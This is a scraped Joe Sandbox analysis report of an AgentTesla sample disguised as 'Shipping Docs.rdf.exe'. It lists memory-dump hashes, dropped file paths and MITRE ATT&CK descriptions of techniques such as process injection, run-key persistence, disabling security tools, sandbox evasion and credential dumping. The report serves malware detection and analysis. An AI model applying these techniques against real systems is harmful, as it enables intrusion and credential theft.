Opcode ID: c47a303571e06310ab9185728c0010333c5f62c2fad4886378c027c60842bf2e
Instruction ID: fbbd544caf0e4cbccfacae914d621dacd91c72f24c7c29659cca6894b8d87ea9
Opcode Fuzzy Hash: c47a303571e06310ab9185728c0010333c5f62c2fad4886378c027c60842bf2e
Instruction Fuzzy Hash: EEF01C74900305CFDB34DB78C499BAD7BF0AB08705F290898D502AB2A0DF748E85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C61AE0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1446034586.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_c60000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79509729b30073dc6e4b15306ed16849123e7ed11b1a09d1d464fa6e94bb790
Instruction ID: 4052c3bb35551fb982a20527a0dacd5ae5fc32ee468aabb91dbad59a477f26d6
Opcode Fuzzy Hash: e79509729b30073dc6e4b15306ed16849123e7ed11b1a09d1d464fa6e94bb790
Instruction Fuzzy Hash: F7D012357002149FC710EB65E949E453778AB49612F5441A5E908CB250EA61DD14C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00C608A8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1446034586.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_c60000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d01a5a24aaf301115b28db1e8239fe74b31cc9795d562ad99cdd4c9f4e4b03
Instruction ID: 4b309ceaffacf8afaef8dfec7a6d2a78f786fbeaee7c2109beee73a7ca525b47
Opcode Fuzzy Hash: 06d01a5a24aaf301115b28db1e8239fe74b31cc9795d562ad99cdd4c9f4e4b03
Instruction Fuzzy Hash: 60D067B1D01219AF8B50EFB999055DEBBF8FE09250B114566D919E3240E7705B10CBD1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Shipping Docs.rdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SVcPIbJno.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipping Docs.rdf.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\boqXv.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alzjplra.dku.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_deb1u32u.f5h.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdt1xv5f.z1e.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4ixhizk.s5f.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0oe3fx2.bso.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkwracat.o5d.ps1

Windows Analysis Report
Shipping Docs.rdf.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre